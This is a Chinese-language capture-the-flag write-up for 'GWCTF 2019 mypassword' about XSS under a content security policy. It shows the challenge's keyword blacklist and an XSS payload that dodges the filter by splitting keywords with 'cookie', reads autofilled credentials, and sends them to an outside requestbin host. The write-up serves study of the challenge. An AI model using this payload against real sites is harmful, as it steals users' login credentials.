[GWCTF 2019]mypassword
阿新 • • 發佈:2020-07-27
[GWCTF 2019]mypassword
知識點
1.XSS
2.CSP
題解
開啟題目,後先檢視原始碼有沒有什麼有用的東西,發現了login.php、register.php以及login.js
//login.js if (document.cookie && document.cookie != '') { var cookies = document.cookie.split('; '); var cookie = {}; for (var i = 0; i < cookies.length; i++) { var arr = cookies[i].split('='); var key = arr[0]; cookie[key] = arr[1]; } if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){ document.getElementsByName("username")[0].value = cookie['user']; document.getElementsByName("password")[0].value = cookie['psw']; } }
程式碼會把cookie中的username和password填進當前表單
註冊登入,根據題目提示這應該不是sql注入題目
再看到feedback.php原始碼中的註釋
if(is_array($feedback)){ echo "<script>alert('反饋不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie']; foreach ($blacklist as $val) { while(true){ if(stripos($feedback,$val) !== false){ $feedback = str_ireplace($val,"",$feedback); }else{ break; } } }
根據黑名單過濾的內容可以判斷為XSS題目了
不過隨便試試提交的內容發現,content.php響應頭內有如下內容
Content-Security-Policy:default-src 'self';script-src 'unsafe-inline' 'self'
允許內聯指令碼執行, 但是不可以遠端請求js指令碼執行
構造payload把賬號密碼發到xss平臺(http://http.requestbin.buuoj.cn/)
<inpcookieut type="text" name="username"></inpcookieut> <inpcookieut type="text" name="password"></inpcookieut> <scricookiept scookierc="./js/login.js"></scricookiept> <scricookiept> var uname = documcookieent.getElemcookieentsByName("username")[0].value; var passwd = documcookieent.getElemcookieentsByName("password")[0].value; var res = uname + " " + passwd; documcookieent.locacookietion="http://http.requestbin.buuoj.cn/*/?a="+res; </scricookiept>
等待一會重新整理requestbin 即可得到賬號密碼,flag為密碼